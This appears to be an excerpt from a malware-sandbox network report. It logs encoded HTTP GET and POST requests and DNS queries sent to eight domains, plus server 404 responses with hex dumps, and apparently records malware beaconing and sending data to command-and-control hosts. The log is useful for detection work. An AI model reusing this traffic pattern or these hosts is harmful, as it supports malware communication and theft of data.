xzC`rM2]yGll&,wS\|lglvE)oNfg9$}d@k}2!! MjoAbYg'_XYCCeOd6+6og+vOq~y=TGNvzD[bjxeFB}6G9k6^/;8G0uWqbykY-\&RA8Y3Z8%P\|q8?WnrSH+px2]WZ^>%fWxV\o

Source: global traffic	HTTP traffic detected: GET /lnl7/?knE=vl8DPVdxl&2nI=kAPJ1zL1a1XedmcrdtHAbU+8MxIg1b6JbBGKYGigv+9peDDnEk+ogR7nF5sJltA40tggf7QxXQcZwaMcwHfgZUCCvIMy+6OdADZldWa3Ro5vmyUj0qJuSG5eCoJgas7XnA== HTTP/1.1Accept: /Accept-Language: en-USConnection: closeHost: www.izmirescortg.xyzUser-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /6xrr/?2nI=HxJAUmNG5a+243k7lB56qNhkSq7m2edDyQfNvKnIMmllTqWhJmPDYD6FfyD5P2YCiK6XZxIiPJwBP5cvXMaBQY2hj09WsNhqz7jh3pjJtHZ6ivVVWaE+CFUoLu/IsL675g==&knE=vl8DPVdxl HTTP/1.1Accept: /Accept-Language: en-USConnection: closeHost: www.aballanet.catUser-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /0mwe/?2nI=I6/MvosI1M4GXnAC7bSYGFqrxYdgJTNe9tmkEszzRtOWIwRcIvXs05Ha3jXYoQpxdY5hB0FWQM1VzVFsJbVN45JDeb7ji4WvSMSl4p5VjB9j7uxKBUhToKF7GDp/0AaWeg==&knE=vl8DPVdxl HTTP/1.1Accept: /Accept-Language: en-USConnection: closeHost: www.madhf.techUser-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /g3h7/?2nI=dyqW+SkpLS8uL5dRky9k7MKcOglS/8z1zEHoC4ozp/UuBc9Lrzv6UHKMHP5rOiU//FkNbu8cLS6TGHyjoU1BRvMsWNScFLLtPX2xNM4zETNmxHASFhTRGutFERc3E41rkQ==&knE=vl8DPVdxl HTTP/1.1Accept: /Accept-Language: en-USConnection: closeHost: www.canadavinreport.siteUser-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /t322/?2nI=FCfXCbowRdQKA3bKzmWhb/MMDIYWCwffvgnpa1jm1l5RPo8GmzCZxrunal2GKioIIi33qnUs85PYplnvRA3XR8V86LXkcIGT0dmKE8rYJBtcLljpCBGaC+nO46fC9uxVPg==&knE=vl8DPVdxl HTTP/1.1Accept: /Accept-Language: en-USConnection: closeHost: www.yunlekeji.topUser-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /iuvu/?2nI=4GSi4NjhieA+eby0NKQzTEPCPA5td1TZNopVgGr+MixqN2kv+x7vZ9YkKN38Qwr7I1LnRiqAhNhB07BIn5yne0LzqH+H8Nzlr/8TCrRqA4T6hsg8YSRhr2x7F+rJ6nzbiw==&knE=vl8DPVdxl HTTP/1.1Accept: /Accept-Language: en-USConnection: closeHost: www.logidant.xyzUser-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /36be/?knE=vl8DPVdxl&2nI=zT+fCPSXWqCfWPgMnoOydtJKsJuCEtGx9/DVuG0pIlquWt59hgdSk8Rx6eVvndf2YPyLwPhL3z2g/EyQU+U7rC5vzNz0ZFCw8d/R3+K3cKRBUeMTJLe+XGej8HjBlTXN1Q== HTTP/1.1Accept: /Accept-Language: en-USConnection: closeHost: www.laohub10.netUser-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /kf1m/?2nI=gD/FPiA75bYZCbZDbB+WsVUzjKMJP+r4HqBHW8I3+Q/3qqcwdH4XqO3fnm/yt4rkfBlpHF229jnZH/lk0nBoXOKBKPZyn2cike7Ub3qNJZbDUNl9s1XUkaYGScVYwZ61FA==&knE=vl8DPVdxl HTTP/1.1Accept: /Accept-Language: en-USConnection: closeHost: www.zkdamdjj.shopUser-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36

Source: global traffic	DNS traffic detected: DNS query: www.izmirescortg.xyz
Source: global traffic	DNS traffic detected: DNS query: www.aballanet.cat
Source: global traffic	DNS traffic detected: DNS query: www.madhf.tech
Source: global traffic	DNS traffic detected: DNS query: www.canadavinreport.site
Source: global traffic	DNS traffic detected: DNS query: www.yunlekeji.top
Source: global traffic	DNS traffic detected: DNS query: www.logidant.xyz
Source: global traffic	DNS traffic detected: DNS query: www.laohub10.net
Source: global traffic	DNS traffic detected: DNS query: www.zkdamdjj.shop

Source: unknown

HTTP traffic detected: POST /6xrr/ HTTP/1.1Accept: */*Accept-Language: en-USAccept-Encoding: gzip, deflate, brContent-Length: 204Connection: closeContent-Type: application/x-www-form-urlencodedCache-Control: max-age=0Host: www.aballanet.catOrigin: http://www.aballanet.catReferer: http://www.aballanet.cat/6xrr/User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36Data Raw: 32 6e 49 3d 4b 7a 68 67 58 51 68 42 2f 49 47 6c 34 6c 45 42 70 41 51 43 7a 4d 39 54 61 38 62 70 39 76 31 41 32 58 50 77 33 38 6e 73 4f 45 64 35 44 34 44 63 63 41 54 62 45 6d 53 62 4b 45 6e 72 45 32 49 4e 39 36 43 68 55 58 49 4f 41 62 51 74 47 71 46 46 61 75 65 52 65 4c 36 70 34 52 6f 57 6a 4a 5a 35 39 34 58 70 33 4c 2f 41 2f 32 70 37 39 4d 34 2f 54 5a 6f 50 64 7a 6c 43 57 76 71 37 6a 59 2f 41 36 76 70 31 4b 59 5a 56 36 67 4d 52 69 67 6a 5a 50 48 43 4d 61 30 52 72 76 39 2b 68 6d 5a 4d 52 34 41 69 62 59 58 4b 50 50 69 6d 58 72 30 44 4f 58 67 33 41 54 44 6f 45 6d 77 52 75 59 30 47 75 6d 38 2b 61 71 47 59 3d Data Ascii: 2nI=KzhgXQhB/IGl4lEBpAQCzM9Ta8bp9v1A2XPw38nsOEd5D4DccATbEmSbKEnrE2IN96ChUXIOAbQtGqFFaueReL6p4RoWjJZ594Xp3L/A/2p79M4/TZoPdzlCWvq7jY/A6vp1KYZV6gMRigjZPHCMa0Rrv9+hmZMR4AibYXKPPimXr0DOXg3ATDoEmwRuY0Gum8+aqGY=

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Jan 2025 21:49:21 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeCache-Control: private, no-cache, no-store, must-revalidate, max-age=0Pragma: no-cachecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ntuec1a6MWIXpw8iimgVhZtdSGxYm7H2n26EBLR%2F9GGsOyPVMga4Gb%2B6NUAaWZcTEf3E2CW5bv1e%2FqCj%2BieRf1TGFyvjvlHAUTKLZfhgQ6It1x%2B8t%2BbvHftg1pNyvnNf03qCEmEZRg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8fffe05d3ebb0f91-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=8815&min_rtt=8815&rtt_var=4407&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=374&delivery_rate=0&cwnd=219&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 34 64 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 Data Ascii: 4d6<!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <d
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Jan 2025 21:49:36 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://aballanet.cat/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: Upgrade, closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 31 34 62 64 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 63 61 22 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 3e 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 50 c3 a0 67 69 6e 61 20 6e 6f 20 74 72 6f 62 61 64 61 20 2d 20 41 6c 62 65 72 74 20 41 62 61 6c 6c 61 6e 65 74 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 41 6c 62 65 72 74 20 41 62 61 6c 6c 61 6e 65 74 2c 20 41 72 71 75 69 74 65 63 74 6f 20 44 6f 63 74 6f 72 20 55 50 43 2c 20 74 72 61 79 65 63 74 6f 72 69 61 2c 20 74 65 73 69 73 20 64 65 20 65 73 74 75 64 69 6f 2c 20 70 75 62 6c 69 63 61 63 69 6f 6e 65 73 20 64 65 20 41 6c 62 65 72 74 20 41 62 61 6c 6c 61 6e 65 74 2c 20 4c 61 20 63 61 73 61 20 61 20 63 75 61 74 72 6f 20 76 69 65 6e 74 6f 73 20 65 6e 20 6c 61 20 42 6f 6e 61 6e 6f 76 61 22 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2d 61 6e 61 6c 79 74 69 63 73 2e 63 6f 6d 22 20 72 65 6c 3d 22 64 6e 73 2d 70 72 65 66 65 74 63 68 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 61 62 61 6c 6c 61 6e 65 74 2e 63 61 74 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 72 77 64 2d 74 68 65 6d 65 2f 69 6d 67 2f 69 63 6f 6e 73 2f 74 6f 75 63 68 2e 70 6e 67 22 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 2d 70 72 65 63 6f 6d 70 6f 73 65 64 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 41 6c 62 65 72 74 20 41 62 61 6c 6c 61 6e 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 62 61 6c 6c 61 6e 65 74 2e 63 61 74 2f 66 65 65 64 2f 22 20 2f 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 41 72 71 75 69 74 65 63 74 65 20 44 6f 63 74 6
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Jan 2025 21:49:39 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://aballanet.cat/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: Upgrade, closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 31 34 62 64 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 63 61 22 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 3e 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 50 c3 a0 67 69 6e 61 20 6e 6f 20 74 72 6f 62 61 64 61 20 2d 20 41 6c 62 65 72 74 20 41 62 61 6c 6c 61 6e 65 74 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 41 6c 62 65 72 74 20 41 62 61 6c 6c 61 6e 65 74 2c 20 41 72 71 75 69 74 65 63 74 6f 20 44 6f 63 74 6f 72 20 55 50 43 2c 20 74 72 61 79 65 63 74 6f 72 69 61 2c 20 74 65 73 69 73 20 64 65 20 65 73 74 75 64 69 6f 2c 20 70 75 62 6c 69 63 61 63 69 6f 6e 65 73 20 64 65 20 41 6c 62 65 72 74 20 41 62 61 6c 6c 61 6e 65 74 2c 20 4c 61 20 63 61 73 61 20 61 20 63 75 61 74 72 6f 20 76 69 65 6e 74 6f 73 20 65 6e 20 6c 61 20 42 6f 6e 61 6e 6f 76 61 22 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2d 61 6e 61 6c 79 74 69 63 73 2e 63 6f 6d 22 20 72 65 6c 3d 22 64 6e 73 2d 70 72 65 66 65 74 63 68 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 61 62 61 6c 6c 61 6e 65 74 2e 63 61 74 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 72 77 64 2d 74 68 65 6d 65 2f 69 6d 67 2f 69 63 6f 6e 73 2f 74 6f 75 63 68 2e 70 6e 67 22 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 2d 70 72 65 63 6f 6d 70 6f 73 65 64 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 41 6c 62 65 72 74 20 41 62 61 6c 6c 61 6e 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 62 61 6c 6c 61 6e 65 74 2e 63 61 74 2f 66 65 65 64 2f 22 20 2f 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 41 72 71 75 69 74 65 63 74 65 20 44 6f 63 74 6
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Jan 2025 21:49:41 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://aballanet.cat/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: Upgrade, closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 31 34 62 64 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 63 61 22 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 3e 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 50 c3 a0 67 69 6e 61 20 6e 6f 20 74 72 6f 62 61 64 61 20 2d 20 41 6c 62 65 72 74 20 41 62 61 6c 6c 61 6e 65 74 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 41 6c 62 65 72 74 20 41 62 61 6c 6c 61 6e 65 74 2c 20 41 72 71 75 69 74 65 63 74 6f 20 44 6f 63 74 6f 72 20 55 50 43 2c 20 74 72 61 79 65 63 74 6f 72 69 61 2c 20 74 65 73 69 73 20 64 65 20 65 73 74 75 64 69 6f 2c 20 70 75 62 6c 69 63 61 63 69 6f 6e 65 73 20 64 65 20 41 6c 62 65 72 74 20 41 62 61 6c 6c 61 6e 65 74 2c 20 4c 61 20 63 61 73 61 20 61 20 63 75 61 74 72 6f 20 76 69 65 6e 74 6f 73 20 65 6e 20 6c 61 20 42 6f 6e 61 6e 6f 76 61 22 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2d 61 6e 61 6c 79 74 69 63 73 2e 63 6f 6d 22 20 72 65 6c 3d 22 64 6e 73 2d 70 72 65 66 65 74 63 68 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 61 62 61 6c 6c 61 6e 65 74 2e 63 61 74 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 72 77 64 2d 74 68 65 6d 65 2f 69 6d 67 2f 69 63 6f 6e 73 2f 74 6f 75 63 68 2e 70 6e 67 22 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 2d 70 72 65 63 6f 6d 70 6f 73 65 64 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 41 6c 62 65 72 74 20 41 62 61 6c 6c 61 6e 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 62 61 6c 6c 61 6e 65 74 2e 63 61 74 2f 66 65 65 64 2f 22 20 2f 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 41 72 71 75 69 74 65 63 74 65 20 44 6f 63 74 6
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: F-WEBDate: Fri, 10 Jan 2025 21:50:18 GMTContent-Type: text/html; charset=UTF-8Content-Length: 910Connection: closeFAI-W-FLOW: 1594076038Service-Lane: e8594f12d42b28ee5775cc58b9d2e933FAI-W-AGENT_AID: 32663896Update-Time: 1736399500Src-Update: trueP3P: CP=CAO PSA OUROrigin-Agent-Cluster: ?0X-Content-Type-Options: nosniffX-Permitted-Cross-Domain-Policies: noneX-XSS-Protection: 1; mode=blockX-Download-Options: noopenX-Frame-Options: SAMEORIGINSet-Cookie: _cliid=znNos1zabNe22zVt; domain=www.yunlekeji.top; path=/; expires=Sat, 10-Jan-2026 21:50:19 GMT; HttpOnlySet-Cookie: _lastEnterDay=2025-01-11; domain=www.yunlekeji.top; path=/; expires=Sun, 12-Jan-2025 21:50:19 GMT; HttpOnlyData Raw: 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 30 22 3e 0a 3c 74 69 74 6c 65 3e e7 b3 bb e7 bb 9f e6 8f 90 e7 a4 ba 3c 2f 74 69 74 6c 65 3e 0a 0a 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 27 2f 2f 32 2e 73 73 2e 35 30 38 73 79 73 2e 63 6f 6d 2f 63 73 73 2f 64 69 73 74 2f 73 74 79 6c 65 73 2f 7a 68 61 6f 62 75 64 61 6f 79 65 2e 6d 69 6e 2e 63 73 73 3f 76 3d 32 30 32 34 30 32 32 32 31 35 33 30 27 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 2f 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 6f 78 22 3e 0a 0a 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 69 74 6c 65 43 6f 6e 74 65 6e 74 22 3e 0a 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 69 74 6c 65 22 3e e7 b3 bb e7 bb 9f e6 8f 90 e7 a4 ba 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 0a 09 Data Ascii: <!DOCTYPE HTML><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0"><title></title><link type="text/css" href='//2.ss.508sys.com/css/dist/styles/zhaobudaoye.min.css?v=202402221530' rel="stylesheet" /></head><body class=""><div class="box"><div class="titleContent"> <div class="title"></div> </div>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: F-WEBDate: Fri, 10 Jan 2025 21:50:21 GMTContent-Type: text/html; charset=UTF-8Content-Length: 910Connection: closeFAI-W-FLOW: 1594158038Service-Lane: e8594f12d42b28ee5775cc58b9d2e933FAI-W-AGENT_AID: 32663896Update-Time: 1736399500Src-Update: trueP3P: CP=CAO PSA OUROrigin-Agent-Cluster: ?0X-Content-Type-Options: nosniffX-Permitted-Cross-Domain-Policies: noneX-XSS-Protection: 1; mode=blockX-Download-Options: noopenX-Frame-Options: SAMEORIGINSet-Cookie: _cliid=oB0AaIcA2mEAtlgA; domain=www.yunlekeji.top; path=/; expires=Sat, 10-Jan-2026 21:50:21 GMT; HttpOnlySet-Cookie: _lastEnterDay=2025-01-11; domain=www.yunlekeji.top; path=/; expires=Sun, 12-Jan-2025 21:50:21 GMT; HttpOnlyData Raw: 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 30 22 3e 0a 3c 74 69 74 6c 65 3e e7 b3 bb e7 bb 9f e6 8f 90 e7 a4 ba 3c 2f 74 69 74 6c 65 3e 0a 0a 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 27 2f 2f 32 2e 73 73 2e 35 30 38 73 79 73 2e 63 6f 6d 2f 63 73 73 2f 64 69 73 74 2f 73 74 79 6c 65 73 2f 7a 68 61 6f 62 75 64 61 6f 79 65 2e 6d 69 6e 2e 63 73 73 3f 76 3d 32 30 32 34 30 32 32 32 31 35 33 30 27 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 2f 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 22 3e 0a 3c 64 69 76 20 63 